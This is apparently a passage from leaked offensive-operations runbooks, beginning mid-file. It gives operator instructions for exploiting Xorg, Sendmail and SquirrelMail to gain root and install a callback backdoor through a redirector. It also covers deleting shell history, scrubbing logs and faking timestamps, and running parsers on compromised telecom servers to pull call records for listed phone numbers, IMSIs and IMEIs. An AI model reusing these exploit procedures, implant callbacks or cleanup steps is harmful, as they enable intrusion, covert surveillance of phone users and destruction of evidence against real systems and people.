conspicuous than that of your user's gid -lt /dev/ chgrp /dev/ -lt /dev # the shell file (/tmp/file######) may need to be cleaned up on target: -lt /tmp -rm /tmp/file* # remove the binary from /tmp -rm exze ### ### END File user.tool.expitiatezeke.COMMON ### (see also ../etc/user.tool.expitiatezeke.COMMON) ### ### BEGIN File user.tool.englandbogy.COMMON (see also ../etc/user.tool.englandbogy.COMMON) ### ####################################### # ENGLANDBOGY ####################################### ### local exploit against Xorg for the following versions: ### Xorg X11R7 1.0.1, X11R7 1.0, X11R6 6.9 ### Includes the following distributions: ### MandrakeSoft Linux 10.2, Ubuntu 5.0.4, SuSE Linux 10.0, ### RedHat Fedora Core5, MandrakeSoft Linux 2006.0 ### Fails-on - Xorg X11R7 1.0.2 and greater and less than Xorg X11R6 6.9. ### Requirements - Target needs to have the Xorg binary as SETUID root. ### ### Exploits the Xorg X server by allowing unprivileged users load arbitrary modules ### OPSEC: ### vulnerability: public ### exploit: public ### Determine if vulnerable: uname -a ### get Xorg version; should be one listed above: Xorg -version ### see if Xorg is setuid root- should look similar to this (-rwsr-xr-x ) ls -la /usr/bin/Xorg ### if tests pass, let's do it: -put /current/up/eb eb -shell ./eb # lots of output similar to this: X Window System Version 6.9.0 Release Date: 21 December 2005 X Protocol Version 11, Revision 0, Release 6.9 Build Operating System: SuSE Linux [ELF] SuSE Current Operating System: Linux linux 2.6.16-rc5-git2-2-default #1 Tue Feb 28 09 :16:17 UTC 2006 i686 Build Date: 26 February 2006 Before reporting problems, check http://wiki.X.Org to make sure that you have the latest version. Module Loader present Markers: (--) probed, (**) from config file, (==) default setting, (++) from command line, (!!) notice, (II) informational, (WW) warning, (EE) error, (NI) not implemented, (??) unknown. (++) Log file: "Xorg.log", Time: Tue Jun 6 10:31:57 2006 (==) Using config file: "/etc/X11/xorg.conf" (EE) LoadModule: Module bitmap does not have a bitmapModuleData data object. (EE) Failed to load module "bitmap" (invalid module, 0) (EE) LoadModule: Module pcidata does not have a pcidataModuleData data object. (EE) Failed to load module "pcidata" (invalid module, 0) Fatal server error: Unable to load required base modules, Exiting... Please consult the The X.Org Foundation support at http://wiki.X.Org for help. Please also check the log file at "Xorg.log" for additional information. ### you probably have root now, so do your unsets: unset HISTFILE unset HISTSIZE unset HISTFILESIZE id ### start a new noserver as root: PATH=. crond ### Connect to nopen: -nstun TARGET_IP ### CLEANUP: # no logging ### ### END File user.tool.englandbogy.COMMON ### (see also ../etc/user.tool.englandbogy.COMMON) ### ### BEGIN File user.tool.earlyshovel.COMMON (see also ../etc/user.tool.earlyshovel.COMMON) ### ######################################################### # EARLYSHOVEL ######################################################### ### publicly known vulnerability ### remote exploit available for linux RH7 running sendmail ###Supported targets: ### "ASPRH73": ASP Linux 7.3 or RedHat 7.3 running Sendmail 8.11.6 ### "RH70": RedHat 7.0 running Sendmail 8.11.0 ### "RH71": RedHat 7.1 running Sendmail 8.11.2 ### "RH73": RedHat 7.3 running Sendmail 8.11.6 ### requires valid user name ( 7.1 and 7.3) ### may also require valid domain for (7.3) mx :%s/REDIRECTOR_IP/REDIRECTOR_IP/g :%s/TARGET_IP/TARGET_IP/g :%s/TARGET_OS/TARGET_OS/g :%s/USER_NAME/USER_NAME/g :%s/DOMAIN/DOMAIN/g :%s/RANDOM_PORT/RANDOM_PORT/g `x #banner mail -scan mail TARGET_IP # alternate way to banner ##on pitch -tunnel l 2525 TARGET_IP 25 ###local scripted telnet 127.0.0.1 2525 ## after getting banner helo DOMAIN mail from: user@DOMAIN # use random user name ### may be getting rejected as spam??? $ ./eash.py -? usage: /current/bin/earlyshovel/eash.py [options] options --atimeout seconds (default = 30) Authentication timeout (in seconds) --cip IPAddress (default = 127.0.0.1) Callback IP address --clport port Local callback port --cport port Callback port --ctimeout seconds (default = 30) Callback timeout (in seconds) --domain domainName Domain name of sender --exec filename File to exec on successful upload -? | --help Print the usage message --recipient emailAddress (default = root) Email recipient --target target Target OS --tip IPAddress (default = 127.0.0.1) Target IP address --tmpnam filename Remote name of the uploaded file (of the form /tmp/fileXXXXXX)(def=filekdBtDF) --tport port (default = 25) Target port --upload filename File to upload Supported targets: "ASPRH73": ASP Linux 7.3 or RedHat 7.3 running Sendmail 8.11.6 "RH70": RedHat 7.0 running Sendmail 8.11.0 "RH71": RedHat 7.1 running Sendmail 8.11.2 "RH72": RedHat 7.2 running Sendmail 8.11.6 ### REDIRECTION -tunnel l 2525 TARGET_IP 25 r RANDOM_PORT ### LOCAL WINDOW: UPLOADS NOPEN AUTOMATCALLY- as of VERSION 2.4.0 cd /current/bin/earlyshovel ./eash.py --tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT --recipient USER_NAME --target TARGET_OS --domain DOMAIN --exec /current/bin/noclient --upload /current/up/morerats/noserver-3.0.3.1-i586.pc.linux.gnu.redhat-5.0 -OR- ### LOCAL WINDOW:MANUAL UPLOAD of NOPEN cd /current/bin/earlyshovel ./eash.py --tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT --recipient USER_NAME --target TARGET_OS ./eash.py --tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT --recipient USER_NAME --target TARGET_OS --domain DOMAIN ### you will get an interactive root shell unset HISTFILE unset HISTFILESIZE unset HISTSIZE id pwd w # upload nopen as sendmail which uudecode uncompress mkdir /tmp/.scsi;cd /tmp/.scsi;pwd # if uudecode/uncompress exists: # LOCALLY cd /current/up cp /current/up/morerats/noserver-3.0.3.1-i586.pc.linux.gnu.redhat-5.0 sendmail compress sendmail uuencode sendmail.Z sendmail.Z > sendmail.Z.uu gedit sendmail.Z.uu # on TARGET in interactive window uudecode; ls -la copy/paste gedit contents into this window umcompress sendmail.Z ls -l chmod 700 sendmail PATH=. sendmail # from redirector -nstun TARGET_IP ###END of MANUAL UPLOAD ###CLEANUP #if nopen is uploaded automatically: -ls /tmp/filekdBtDF -rm /tmp/filekdBtDF # look where mail may be logged grep mail /etc/syslog.conf -tail /var/log/maillog #remove mail messages from file grep USER_NAME /var/log/maillog # do this;if grep will clean everything needed -gs grepout USER_NAME /var/log/maillog # if our logs entries are the only entries in file cat /dev/null > /var/log/maillog #change timestamp of file -touch /var/log/? /var/log/maillog #delete mail msgs from users mail dir: path may be different -lt /var/spool/mail/USER_NAME -get /var/spool/mail/USER_NAME #locally cp /current/down/hostname.IP/var/spool/mail/USER_NAME /current/up/t cd /current/up/t #remove email from t -put /current/up/t t #target window #if it looks good cat t > /var/spool/mail/USER_NAME # touch file to a "good" date touch -t YYMMDDHHMM.ss /var/spool/mail/USER_NAME #does user have a home dir grep USER_NAME /etc/passwd # look for users home dir and list it -lt ?/?/USER_NAME ## look for .procmail or .forward files cat files if there.... ### ### END File user.tool.earlyshovel.COMMON ### (see also ../etc/user.tool.earlyshovel.COMMON) ### ### BEGIN File user.tool.curserazor.COMMON (see also ../etc/user.tool.curserazor.COMMON) ### ################ CURSERAZOR ######################### ############### PARSING ################################################################### ### vi Search/Replace commands ### ### ProjectName - self explanatory ### Date field - today's date, used for output files ### Host - hostname of the box (not IP address) ### Cryptkey - encryption key (use output from below md5sum command) md5sum /current/down/tcpdump.raw mx :%s/PROJECTNAME/PROJECTNAME/g :%s/DDMonYY/DDMonYY/g :%s/HOST/HOST/g :%s/CRYPTKEY/CRYPTKEY/g 'x ### Save the encryption key locally: echo CRYPTKEY > /current/down/cryptkey.curserazor.DDMonYY ####### Prepare files containing numbers to search for: # if files containing the numbers to search available: mkdir /current/down/argfiles cd /current/down/argfiles mz cp /mnt/zip*/arg* /current/down/argfiles #or cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles ls -altr ### Prep the argfiles: ### make sure the files are ASCII and contain NO EMPTY LINES!! ### make sure the last line does not contain a null character at the end ### (vi the file, add a carriage return to the last line, then delete the empty ### line and save) ### "file" results: ### This will not work: ASCII text, with CRLF line terminators ### This WILL: ASCII text cat arg* file arg* dos2unix arg* file arg* # if no data media is provided: # locally, create a file of numbers to grep for with each number on a separate line # make sure there are NO EMPTY LINES!!!! # if searching for LACs and cell id's, use the format in the documentation: # ex. - 410 01 95 18374 # if searching for phone numbers, use the normal format: # ex. - 4837506 cd /current/down/argfiles vi /current/down/argfiles/argfile1.txt ### Make sure find the cryptTool...add to PATH if which fails... which cryptTool.v1.0.Linux2.4.18-14.targetdl ### To encrypt one at a time... cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTKEY -b cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTKEY -b file argfile*.enc ### Loop to encrypt all the argfiles cd /current/down/argfiles for i in argfile*.txt; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o $i.enc -k CRYPTKEY -b file argfile*.enc ########## To look at CDR directories try the following: ### Use the following commands to determine the location of current ### CDR data storage; Once you identify the location of the data, you'll ### use the head/tail commands to determine the date ranges being saved. ### These date ranges will be used as args in the curserazor commands. ### Typical file locations per host: ########################## hazyrazor: # paths based on isb-ser-imelive 172.20.16.136 ls -l /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/*200710*GCDR$ | wc ls -l /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ | grep 200710.*GCDR$ | head -30 ls -l /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ | grep 200710.*GCDR$ | tail -30 ### Tips for running the CURSERAZOR 1.1 ### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or >>T: )!!!! ### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc if additional ### passes are needed for the date range ### The phone list is deleted automatically ######## Upload the parser (CURSERAZOR) and call it nscd # put up the parser tool # First, using a wildcard, confirm our hidden directory (and that we are priveleged) -ctrl -d # or maybe something like this? -ls /lib/.02dbb* # Now (using the full path, this wildcard will fail), cd there and add it to our path -cd /lib/.02dbb* -addpath . # Put up the tool as nscd -put /current/up/curserazor.v1.1.SunOS5.10.targetdl nscd which nscd -lt -setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007103*GCDR' -print" -P ./awk -ls -t which nscd ##### Upload the encrypted phone list as awk, modify each parser command to have the ##### correct directory and date range of files to parse, then run the parser: ##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1.enc) ##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more2, etc.) ##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS TIME ALLOWS ############ argfile 1 -put /current/down/argfiles/argfile1.enc awk -setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007103*GCDR' -print" -P ./awk nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc1 -beep 15 ### Run again if needed for same tasking -put /current/down/argfiles/argfile1.enc awk -setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007102[89]*GCDR' -print" -P ./awk ./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc1.more -beep 15 ############ argfile 2 -put /current/down/argfiles/argfile2.enc awk -setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007103*GCDR' -print" -P ./awk nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc2 -beep 15 ### Run again if needed for same tasking -put /current/down/argfiles/argfile2.enc awk -setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007102[89]*GCDR' -print" -P ./awk ./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc2.more -beep 15 ############ argfile 3 -put /current/down/argfiles/argfile2.enc awk -setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007103*GCDR' -print" -P ./awk nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc2 -beep 15 ### Run again if needed for same tasking -put /current/down/argfiles/argfile2.enc awk -setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007102[89]*GCDR' -print" -P ./awk ./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc2.more -beep 15 ###### ###### survey mode: ###### ### checks for IMEIs that have more than one IMSI associated with it: ### to limit amount of memory used, replace "-x" with "-X numberBytes" -setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007102[89]*GCDR' -print" -x ./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc.surveyIMEI ### generates a list of Cell IDs associated with each MSC address: ### to limit amount of memory used, replace "-y" with "-Y numberBytes" -setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007102[89]*GCDR' -print" -y ./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc.surveyMSC ###### ##### when it's done running, decrypt the file (-d -c options) ###### cd /current/down ls -latr cdrhits*enc* # to decrypt individually: cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.curserazor.HOST.DDMonYY.enc1 -o cdrhits.curserazor.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.curserazor.HOST.DDMonYY.enc2 -o cdrhits.curserazor.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c # or decrypt all at one time (once all are written fully) cd /current/down for i in cdrhits*enc* ; do n="`echo $i | sed \"s,enc,txt,g\"`" ; cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o $n -k CRYPTKEY -d -c ; done ls -latr cdr*txt* ###### ###### If you need to stop the parser before it completes: ### Control-C the nopen window containing the parser command ### ps -ef |grep nscd ### if the parser command is still "running", then kill the process: ### kill -9 ### You'll still be able to decrypt the partially completed data pull ###### ###### copy DECRYPTED data to media ###### ls -l cdrhits*txt* mz cp cdrhits*txt* /mnt/zip*/PROJECTNAME ls -l /mnt/zip*/PROJECTNAME uz ##### ##### clean up ##### -rm nscd awk -lt -cd /tmp -lt w ps -ef | sort -lt / -burnBURN ### ### END File user.tool.curserazor.COMMON ### (see also ../etc/user.tool.curserazor.COMMON) ### ### BEGIN File user.tool.cursehappy.preversion4.COMMON (see also ../etc/user.tool.cursehappy.preversion4.COMMON) ### ################ CURSEHAPPY ######################### ############### PARSING ################################################################### ### vi Search/Replace commands ### ### ProjectName - self explanatory ### Date field - today's date, used for output files ### Rec type - record type correlates with ProjectName, valid values: eh, ls, ss, wb ### Host - hostname of the box (not IP address) ### Cryptkey - encryption key (use output from below md5sum command) md5sum /current/down/tcpdump.raw mx :%s/PROJECTNAME/PROJECTNAME/g :%s/DDMonYY/DDMonYY/g :%s/RECTYPE/RECTYPE/g :%s/HOST/HOST/g :%s/CRYPTKEY/CRYPTKEY/g 'x ### Save the encryption key locally: echo CRYPTKEY > /current/down/cryptkey.cursehappy.DDMonYY ####### Prepare files containing numbers to search for: # if files containing the numbers to search available: mkdir /current/down/argfiles cd /current/down/argfiles mz cp /mnt/zip*/arg* /current/down/argfiles #or cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles ls -altr ### Prep the argfiles: ### make sure the files are ASCII and contain NO EMPTY LINES!! ### make sure the last line does not contain a null character at the end ### (vi the file, add a carriage return to the last line, then delete the empty ### line and save) ### "file" results: ### This will not work: ASCII text, with CRLF line terminators ### This WILL: ASCII text cat arg* file arg* dos2unix arg* file arg* # if no data media is provided: # locally, create a file of numbers to grep for with each number on a separate line # make sure there are NO EMPTY LINES!!!! # Format of each type of argument: # p123456789 - phone number # s123456789 - IMSI # e123456789 - IMEI # c123/456 - Cell/LAC (no leading 0's) cd /current/down/argfiles vi /current/down/argfiles/argfile1.txt ########## To look at CDR directories try the following: ### Use the following commands to determine the location of current ### CDR data storage; Once you identify the location of the data, you'll ### use the head/tail commands to determine the date ranges being saved. ### These date ranges will be used as args in the cursehappy commands. ### Typical file locations per host: ########################## wholeblue: # tpmw01 10.3.4.55 # tpmw02 10.3.4.56 ### verifies isb, khi, and lhr directories: ls -ld /tp/med/datastore/collect/siemens_msc_* ls -ld /tp/med/datastore/collect/siemens_msc_*/.tmp_ncr ls -ld /tp/med/archive/collect/siemens_msc_* ls -ld /tp/med/archive/collect/siemens_msc_*/.tmp_ncr ### shows oldest and newest files in directories: ls -latr /tp/med/datastore/collect/*isb*/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*isb*/*.MSC | tail -10 ls -latr /tp/med/datastore/collect/*khi*/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*khi*/*.MSC | tail -10 ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | tail -10 ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | tail -10 ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | tail -10 ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | tail -10 # isbapro1 10.5.7.51 # nothing new -lt /u01/product_evdp/evident/data_store/collect ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | head -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | tail -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | head -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | tail -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | head -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | tail -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | head -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | tail -10 -lt /u03/archive/collect # newer stuff ls -latr /u03/archive/collect/siemens_msc_isb01 | head -10 ls -latr /u03/archive/collect/siemens_msc_isb01 | tail -10 ls -latr /u03/archive/collect/siemens_msc_isb01 | wc -l # old stuff: ls -latr /u03/archive/collect/siemens_msc_khi01 | head -10 ls -latr /u03/archive/collect/siemens_msc_khi01 | tail -10 ########################## editionhaze: ls -latr /u06/saba/CDR/out/MS* | head -10 ls -latr /u06/saba/CDR/out/MS* | tail -10 ls -latr /u06/saba/CDR/out/MS* | wc -l ########################## liquidsteel: ########################## sicklestar: ### magnum: CURSEHAPPY not working on all SS .usd files :-( ### Try these first, should be all of them in one spot ls -latr /usd_archive/mc_storage/*usd | head -10 ls -latr /usd_archive/mc_storage/*usd | tail -10 ### If none in previous ones... ls -latr /sys1/var/billing/out_coll/*usd | head -10 ls -latr /sys1/var/billing/out_coll/*usd | tail -10 ls -latr /sys1/var/alcatel/out_coll/*usd | head -10 ls -latr /sys1/var/alcatel/out_coll/*usd | tail -10 ls -latr /sys1/var/billing/msc_is2 | tail -20 ########################## CURSEHAPPY ######################################################## ############################################################################################### ### Now, encrypt the ascii list...first make sure you have the encryption tool: which cryptTool.v1.0.Linux2.4.18-14.targetdl ### If cryptTool not in PATH, change your PATH or insert full path in command ### to encrypt one at a time...skip to next comment to encrypt all at once: cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTKEY -b cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTKEY -b file argfile*.enc ### to encrypt all at the same time: for i in argfile* ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i .txt`.enc -k CRYPTKEY -b ; done ls -l file argfile*.enc ### Tips for running the CURSEHAPPY 3.2 ### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or >>T: )!!!! ### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc if additional ### passes are needed for the date range ### DO NOT use -loglevel if also using >L: or >T: (mixed output corrupts the decryption) ### The phone list is NOT deleted automatically in v3.2 ### remove it between each run as a practice ### Useful options: -n name of text file containing phone numbers -rt record type: eh, ls, ss, RECTYPE -files list of files to parse (can contain wildcards) optional - same as no option -d output optional fields -all all record output (no search performed) -loglevel [#] level of info emitted via stderr:0,1,2,3 ######## Upload the parser (CURSEHAPPY) and called it crond # put up the parser tool mkdir /tmp/.scsi -cd /tmp/.scsi -put /current/up/cursehappy crond # or -put /mnt/zip*/cursehappy crond ##### Upload the encrypted phone list as adm, modify each parser command to have the ##### correct directory and date range of files to parse, then run the parser: ##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1.enc) ##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more2, etc.) ##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS TIME ALLOWS ############ argfile 1 -put /current/down/argfiles/argfile1.enc adm KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -d /CHANGEME/CDRFILES.2006071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc1 -beep 15 ### Remove tasking once crond is running -rm adm ### Run again if needed for same tasking -put /current/down/argfiles/argfile1.enc adm KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -d /CHANGEME/CDRFILES.2006071[012]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc1.more -beep 15 -rm adm ############ argfile 2 -put /current/down/argfiles/argfile2.enc adm KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -d /CHANGEME/CDRFILES.2006071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc2 -beep 15 ### Remove tasking once crond is running -rm adm ### Run again if needed for same tasking -put /current/down/argfiles/argfile2.enc adm KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -d /CHANGEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc2.more -beep 15 -rm adm ############ argfile 3 -put /current/down/argfiles/argfile3.enc adm KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -d /CHANGEME/CDRFILES.2006071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc3 -beep 15 ### Remove tasking once crond is running -rm adm ### Run again if needed for same tasking -put /current/down/argfiles/argfile3.enc adm KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -d /CHANGEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc3.more -beep 15 -rm adm ############# ############# for loglevel testing (local file should be ascii?) ############# -put /current/down/argfiles/argfile1.enc adm KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -w e -loglevel 2 -d /CHANGEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.test -beep 15 -rm adm ###### ##### when it's done running, decrypt the file (-d -c options) ###### cd /current/down ls -latr cdr*enc* # to decrypt individually: cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc1 -o cdrhits.cursehappy.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc2 -o cdrhits.cursehappy.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c # or decrypt all at one time (once all are written fully) cd /current/down for i in cdrhits*enc* ; do n="`echo $i | sed \"s,enc,txt,g\"`" ; cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o $n -k CRYPTKEY -d -c ; done ls -latr cdr*txt* ###### ###### If you need to stop the parser before it completes: ### Control-C the nopen window containing the parser command ### ps -ef |grep crond ### if the parser command is still "running", then kill the process: ### kill -9 ### You'll still be able to decrypt the partially completed data pull ###### ###### copy DECRYPTED data to media ###### ls -l cdr*txt* mz cp cdr*txt* /mnt/zip*/PROJECTNAME ls -l /mnt/zip*/PROJECTNAME uz ##### ##### clean up ##### -rm crond adm -lt -cd /tmp -rm .scsi -lt w ps -ef | sort -lt / -burnBURN ### ### END File user.tool.cursehappy.preversion4.COMMON ### (see also ../etc/user.tool.cursehappy.preversion4.COMMON) ### ### BEGIN File user.tool.elideskew.COMMON (see also ../etc/user.tool.elideskew.COMMON) ### ######################################################### # ELIDESKEW v1.0.0.1 ######################################################### ### Public known vulnerablity in SquirrelMail versions 1.4.0 - 1.4.7 ### Patched for versions => 1.4.8 ### Tested on CentOS and FreeBSD successfully ### will be apache on target; use approprate tool( if available) to elevate mx :%s/REDIRECTOR_IP/REDIRECTOR_IP/g :%s/TARGET_IP/TARGET_IP/g :%s/RANDOM_PORT/RANDOM_PORT/g `x ### scan port 80 to look for squirrel banner ( may report version; needs to ### be version 1.4.0 - 1.4.7 to work) ### need banner to help determine squirrel mail dir -scan http TARGET_IP ### set up redirection ### on redirector -tunnel l 80 TARGET_IP ## get ELIDESKEW usage ## scripted local window cd /current/bin ./elideskew.pl -ch - Check forexploit -l [file] - File to upload -r [path] - Upload destination path/filename -c [String] - Command Line to execute, if you want to use the file just uploded, then INCLUDE IT. -u [url] - http://host.com/squirrelMail/ get from http banner eg. /webapps/sq147 ## test for exploit vulnerability ## local scripted window ./elideskew.pl -u http://127.0.0.1/webapps/sq147 -ch ### will report YES ( with OS) or NO ### sample good output ###Checking... ###Linux webapps.jetson.net 2.6.9-42.ELsmp #1 SMP Sat Aug 12 09:39:11 CDT 2006 i686 i686 i386 GNU/Linux ###YES! ### If vulnerable; proceed; run commands on target to find dir read/writeable by apache ./elideskew.pl -u http://127.0.0.1/webapps/sq147 -c 'uname -a; w; pwd; ls -al ../data' ### note pwd result; /var/www/html/webapps/sq147/src (default dir) is not writeable/executable by apache but ../data is.... ### Ready to upload and execute NOPEN ### on REDIRECTOR_IP -nrtun RANDOM_PORT ### local scripted window [[ note: the backticks "`" may or may not be necessary ]] ./elideskew.pl -u http://127.0.0.1/webapps/sq147 -l /current/up/morerats/noserver-3.0.3.6-i686.pc.linux.gnuoldld.redhat-6.0 -r /var/www/html/webapps/sq147/data/nos -c '`D=-cREDIRECTOR_IP:RANDOM_PORT /var/www/html/webapps/sq147/data/nos`' ### if all goes well you will be apache on target (note: some apache configurations run as nobody) need to elevate; choose appropriate tool ### cleaning logs Logging varies by platform: on CentOS - /var/log/httpd/error_log ; CentOS runs SELinux so it also logs when nopen tries to call back in /var/log/messages. CentOS will not allow nopen to bind to a port as a server so must use callback mode for nopen on FreeBSD - [APACHE_PREFIX]/logs/error_log ### ### END File user.tool.elideskew.COMMON ### (see also ../etc/user.tool.elideskew.COMMON) ### ### BEGIN File user.tool.poptop.COMMON (see also ../etc/user.tool.poptop.COMMON) ### ### EncTelnet/Poptop ### To use Nopen over an existing connection (i.e. telnet) ### Window 1: Nopen Window - Setup tunnel to dude telnetting to -tunnel l 2323 DUDE 23 ### Window 2: Local scripted window - Use spawn to be your telnet client ### The window will look kinda funny with debug telnet negotiation stuff ### going by, and you'll see the typed password in the clear...get over it spawn.v3 127.0.0.1 2323 telnet ### Window 3: Local window: prep poptop/noserver cp TARGNOSERVER /current/up/nscd cp TARGPOPTOP /current/up/crond compress nscd crond uuencode nscd.Z nscd.Z > nscd.uu uuencode crond.Z crond.Z > crond.uu ### Window 2: Accept files for upload uudecode --p /current/up/nscd.uu uudecode --p /current/up/crond.uu uncompress nscd.Z crond.Z ### Window 2: Run Nopen and poptop chmod 700 nscd crond PATH=. D=-lPORT nscd PATH=. crond ### 1st prompt for "arg" is port PORT ### 2nd prompt for "arg" is file descriptor, use 0 for stdin 0 ### Should now get a line saying "tty is setup" ### Window 4: Local scripted window: setup for Nopen connect noclient -l 8080 ### Window 2: type "---" and hit enter, should ### have a connection in your noclient window then --- ### Window 4: To get multiple windows on target, will need use this window ### as a -tunnel window, and tunnel to yourself over loopback ### And oh yeah, remove the binaries -rm crond nscd -tunnel l PORT 127.0.0.1 ### In other scripted windows noclient 127.0.0.1:PORT ### Do whatever you need to do... ### When all done... -burnBURN ### Window 2: this window will now probably go nuts, ^C will ### take you back to your op box shell prompt, and officially ### close your telnet 